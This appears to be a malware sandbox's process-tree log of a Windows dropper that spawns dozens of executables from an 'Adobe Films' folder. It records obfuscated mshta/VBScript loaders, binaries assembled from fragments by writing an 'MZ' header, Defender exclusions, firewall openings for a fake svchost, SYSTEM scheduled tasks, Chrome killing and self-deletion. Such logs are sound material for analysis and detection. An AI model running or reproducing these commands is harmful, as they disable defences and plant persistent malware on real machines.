C:\Users\Admin\Pictures\Adobe Films\oJ4XMfb6VqT9D_p5k2dav_8e.exe"C:\Users\Admin\Pictures\Adobe Films\oJ4XMfb6VqT9D_p5k2dav_8e.exe"8⤵PID:5972
-
-
C:\Users\Admin\Pictures\Adobe Films\NycIeO2so5RJucOBy1vBFIV0.exe"C:\Users\Admin\Pictures\Adobe Films\NycIeO2so5RJucOBy1vBFIV0.exe"8⤵PID:5500
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:5364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:2328
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vW4qpz4KySPNh6oUY_AqOEO_.exe"C:\Users\Admin\Pictures\Adobe Films\vW4qpz4KySPNh6oUY_AqOEO_.exe"8⤵PID:6548
-
-
C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe"C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe"8⤵PID:7152
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:4372
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\ZHQjWfa2xsv3dasC2yL2Q7LU.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:5992
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:6308
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "ZHQjWfa2xsv3dasC2yL2Q7LU.exe"11⤵
- Kills process with taskkill
PID:6912
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x1sMdPJGi3K2IJPFXXiP6pGz.exe"C:\Users\Admin\Pictures\Adobe Films\x1sMdPJGi3K2IJPFXXiP6pGz.exe"8⤵PID:6996
-
-
C:\Users\Admin\Pictures\Adobe Films\DWWGlUgvtwFXXPItrlfSsKqY.exe"C:\Users\Admin\Pictures\Adobe Films\DWWGlUgvtwFXXPItrlfSsKqY.exe"8⤵PID:6212
-
-
C:\Users\Admin\Pictures\Adobe Films\PQXEAMnmcaBXvCn49611DGME.exe"C:\Users\Admin\Pictures\Adobe Films\PQXEAMnmcaBXvCn49611DGME.exe"8⤵PID:6004
-
C:\Users\Admin\Pictures\Adobe Films\PQXEAMnmcaBXvCn49611DGME.exe"C:\Users\Admin\Pictures\Adobe Films\PQXEAMnmcaBXvCn49611DGME.exe" -u9⤵PID:4412
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yDdsMrt2JC6mCfnLDo6SMsxA.exe"C:\Users\Admin\Pictures\Adobe Films\yDdsMrt2JC6mCfnLDo6SMsxA.exe"8⤵PID:4364
-
-
C:\Users\Admin\Pictures\Adobe Films\xSQSrTIprCuiESMHBaM4sONT.exe"C:\Users\Admin\Pictures\Adobe Films\xSQSrTIprCuiESMHBaM4sONT.exe"8⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\is-7S6K1.tmp\xSQSrTIprCuiESMHBaM4sONT.tmp"C:\Users\Admin\AppData\Local\Temp\is-7S6K1.tmp\xSQSrTIprCuiESMHBaM4sONT.tmp" /SL5="$303DC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\xSQSrTIprCuiESMHBaM4sONT.exe"9⤵PID:4976
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2076b72c2666aa9c.exe4⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2076b72c2666aa9c.exeTue2076b72c2666aa9c.exe5⤵
- Executes dropped EXE
PID:3540 -
C:\Users\Admin\Pictures\Adobe Films\G9hTr3XtR9qGBVhhj1vYaLo8.exe"C:\Users\Admin\Pictures\Adobe Films\G9hTr3XtR9qGBVhhj1vYaLo8.exe"6⤵PID:4732
-
-
C:\Users\Admin\Pictures\Adobe Films\qk4n3oROVUlOaoD4eBH8Iova.exe"C:\Users\Admin\Pictures\Adobe Films\qk4n3oROVUlOaoD4eBH8Iova.exe"6⤵PID:4656
-
-
C:\Users\Admin\Pictures\Adobe Films\qLIYm1_tmF9dmQfwef0qKoHu.exe"C:\Users\Admin\Pictures\Adobe Films\qLIYm1_tmF9dmQfwef0qKoHu.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1100
-
-
C:\Users\Admin\Pictures\Adobe Films\92knAwkOTYRFnQqsvsZ9yBCs.exe"C:\Users\Admin\Pictures\Adobe Films\92knAwkOTYRFnQqsvsZ9yBCs.exe"6⤵PID:3644
-
-
C:\Users\Admin\Pictures\Adobe Films\0VFU87rHIvk_gx9G5lLrPOSb.exe"C:\Users\Admin\Pictures\Adobe Films\0VFU87rHIvk_gx9G5lLrPOSb.exe"6⤵PID:356
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:4724
-
-
-
C:\Users\Admin\Pictures\Adobe Films\KgrdWeCrgyqr4odz5HuI3RIL.exe"C:\Users\Admin\Pictures\Adobe Films\KgrdWeCrgyqr4odz5HuI3RIL.exe"6⤵PID:4740
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6384
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Xeau3zkFNY2WsT48AUzATBgt.exe"C:\Users\Admin\Pictures\Adobe Films\Xeau3zkFNY2WsT48AUzATBgt.exe"6⤵PID:4952
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:4396
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EX3poQOgFoiq9Ghu3I1Tlkpq.exe"C:\Users\Admin\Pictures\Adobe Films\EX3poQOgFoiq9Ghu3I1Tlkpq.exe"6⤵PID:4608
-
-
C:\Users\Admin\Pictures\Adobe Films\pRF7OT958_fEtc1VFxvtR638.exe"C:\Users\Admin\Pictures\Adobe Films\pRF7OT958_fEtc1VFxvtR638.exe"6⤵PID:4664
-
C:\Users\Admin\Pictures\Adobe Films\pRF7OT958_fEtc1VFxvtR638.exe"C:\Users\Admin\Pictures\Adobe Films\pRF7OT958_fEtc1VFxvtR638.exe"7⤵PID:4400
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Mygki8t4hfYkoMKFW76ExDT7.exe"C:\Users\Admin\Pictures\Adobe Films\Mygki8t4hfYkoMKFW76ExDT7.exe"6⤵PID:4640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6647⤵
- Program crash
PID:3944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6807⤵
- Program crash
PID:2072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6407⤵
- Program crash
PID:5440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6727⤵
- Program crash
PID:6028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 11167⤵
- Program crash
PID:6848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 11087⤵
- Program crash
PID:6716
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9ah5C5ONBTgN1LZcO_y0IFV7.exe"C:\Users\Admin\Pictures\Adobe Films\9ah5C5ONBTgN1LZcO_y0IFV7.exe"6⤵PID:5116
-
C:\Users\Admin\Pictures\Adobe Films\9ah5C5ONBTgN1LZcO_y0IFV7.exe"C:\Users\Admin\Pictures\Adobe Films\9ah5C5ONBTgN1LZcO_y0IFV7.exe"7⤵PID:6840
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_R5MgAQNzqjmtqsm6hL3NAiv.exe"C:\Users\Admin\Pictures\Adobe Films\_R5MgAQNzqjmtqsm6hL3NAiv.exe"6⤵PID:952
-
-
C:\Users\Admin\Pictures\Adobe Films\6Sa8QBFzFrD0Vv5SyAQfSPmm.exe"C:\Users\Admin\Pictures\Adobe Films\6Sa8QBFzFrD0Vv5SyAQfSPmm.exe"6⤵PID:4520
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:1436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 5567⤵
- Program crash
PID:2200
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OkzQm_DVGJBF5bbMSR4ertOF.exe"C:\Users\Admin\Pictures\Adobe Films\OkzQm_DVGJBF5bbMSR4ertOF.exe"6⤵PID:1716
-
-
C:\Users\Admin\Pictures\Adobe Films\KlUvUVDxcT3Sdz6vSrJtpbgp.exe"C:\Users\Admin\Pictures\Adobe Films\KlUvUVDxcT3Sdz6vSrJtpbgp.exe"6⤵PID:4800
-
-
C:\Users\Admin\Pictures\Adobe Films\NBsxkavZJASFqkrB2DiUkK6I.exe"C:\Users\Admin\Pictures\Adobe Films\NBsxkavZJASFqkrB2DiUkK6I.exe"6⤵PID:3640
-
-
C:\Users\Admin\Pictures\Adobe Films\nWabeR5sK30veZa_9EAsrazU.exe"C:\Users\Admin\Pictures\Adobe Films\nWabeR5sK30veZa_9EAsrazU.exe"6⤵PID:1044
-
-
C:\Users\Admin\Pictures\Adobe Films\M4bmK7cCETg6ol0dZZLgEgv7.exe"C:\Users\Admin\Pictures\Adobe Films\M4bmK7cCETg6ol0dZZLgEgv7.exe"6⤵PID:4280
-
-
C:\Users\Admin\Pictures\Adobe Films\H4g5YDNSaqcbj9lpFCLQESn_.exe"C:\Users\Admin\Pictures\Adobe Films\H4g5YDNSaqcbj9lpFCLQESn_.exe"6⤵PID:892
-
-
C:\Users\Admin\Pictures\Adobe Films\jBLEecnla7FgKGK6m8Bho9zO.exe"C:\Users\Admin\Pictures\Adobe Films\jBLEecnla7FgKGK6m8Bho9zO.exe"6⤵PID:2648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\jBLEecnla7FgKGK6m8Bho9zO.exe" & exit7⤵PID:5400
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:4320
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TpDdWKe4qbhyIPRRcjnAJJU9.exe"C:\Users\Admin\Pictures\Adobe Films\TpDdWKe4qbhyIPRRcjnAJJU9.exe"6⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\6203531.exe"C:\Users\Admin\AppData\Roaming\6203531.exe"7⤵PID:5664
-
-
C:\Users\Admin\AppData\Roaming\792382.exe"C:\Users\Admin\AppData\Roaming\792382.exe"7⤵PID:5684
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Roaming\6626155.exe"C:\Users\Admin\AppData\Roaming\6626155.exe"7⤵PID:5192
-
-
C:\Users\Admin\AppData\Roaming\3126794.exe"C:\Users\Admin\AppData\Roaming\3126794.exe"7⤵PID:5440
-
-
C:\Users\Admin\AppData\Roaming\852952.exe"C:\Users\Admin\AppData\Roaming\852952.exe"7⤵PID:6080
-
-
C:\Users\Admin\AppData\Roaming\2265233.exe"C:\Users\Admin\AppData\Roaming\2265233.exe"7⤵PID:5888
-
-
C:\Users\Admin\AppData\Roaming\7559050.exe"C:\Users\Admin\AppData\Roaming\7559050.exe"7⤵PID:4036
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\7559050.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\7559050.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )8⤵PID:4904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\7559050.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\7559050.exe" ) do taskkill /F /Im "%~Nxk"9⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ10⤵PID:6484
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )11⤵PID:6808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"12⤵PID:5576
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )11⤵PID:6492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM12⤵PID:1016
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "13⤵PID:6508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"13⤵PID:6736
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM13⤵PID:2260
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM14⤵PID:5000
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "7559050.exe"10⤵
- Kills process with taskkill
PID:6728
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vjCBsCm10BHBwDqsTwu3WZLE.exe"C:\Users\Admin\Pictures\Adobe Films\vjCBsCm10BHBwDqsTwu3WZLE.exe"6⤵PID:4580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:5552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:5620
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5704
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5768
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:5784
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:5860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵PID:5896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵PID:6200
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:6260
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:6392
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe"C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe"6⤵PID:4264
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵PID:4764
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\zzDDi1hvxVBQvUm8c9B_V0YD.exe" ) do taskkill -im "%~NxK" -F8⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵PID:6104
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵PID:5732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵PID:6088
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵PID:6812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵PID:6180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵PID:6896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵PID:6544
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵PID:5640
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "zzDDi1hvxVBQvUm8c9B_V0YD.exe" -F9⤵
- Kills process with taskkill
PID:5208
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6mAa_PI6yQLm3pWVyMndZim5.exe"C:\Users\Admin\Pictures\Adobe Films\6mAa_PI6yQLm3pWVyMndZim5.exe"6⤵PID:6792
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵PID:4996
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20abd30733a17.exe4⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20abd30733a17.exeTue20abd30733a17.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue207c76c7f37.exe4⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue207c76c7f37.exeTue207c76c7f37.exe5⤵
- Executes dropped EXE
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue207c76c7f37.exeC:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue207c76c7f37.exe6⤵PID:4344
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2082eedf21.exe /mixone4⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2082eedf21.exeTue2082eedf21.exe /mixone5⤵
- Executes dropped EXE
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue2082eedf21.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2082eedf21.exe" & exit6⤵PID:2180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue2082eedf21.exe" /f7⤵
- Kills process with taskkill
PID:5324
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20d8f1968de62f282.exe4⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20d8f1968de62f282.exeTue20d8f1968de62f282.exe5⤵
- Executes dropped EXE
PID:3248 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3248 -s 13766⤵
- Program crash
PID:4296
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue205724605816e79.exe4⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue205724605816e79.exeTue205724605816e79.exe5⤵
- Executes dropped EXE
PID:768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2095db5b6bd7.exe4⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2095db5b6bd7.exeTue2095db5b6bd7.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3808 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4952
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2082ea84bd.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20c79bfdadc.exe4⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exeTue20c79bfdadc.exe5⤵
- Executes dropped EXE
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exeC:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exe6⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exeC:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exe6⤵PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exeC:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20c79bfdadc.exe6⤵PID:4852
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue203dd57461.exe4⤵PID:2324
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue203dd57461.exeTue203dd57461.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 6124⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2082ea84bd.exeTue2082ea84bd.exe1⤵
- Executes dropped EXE
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2082ea84bd.exeC:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue2082ea84bd.exe2⤵PID:4324
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4908 -
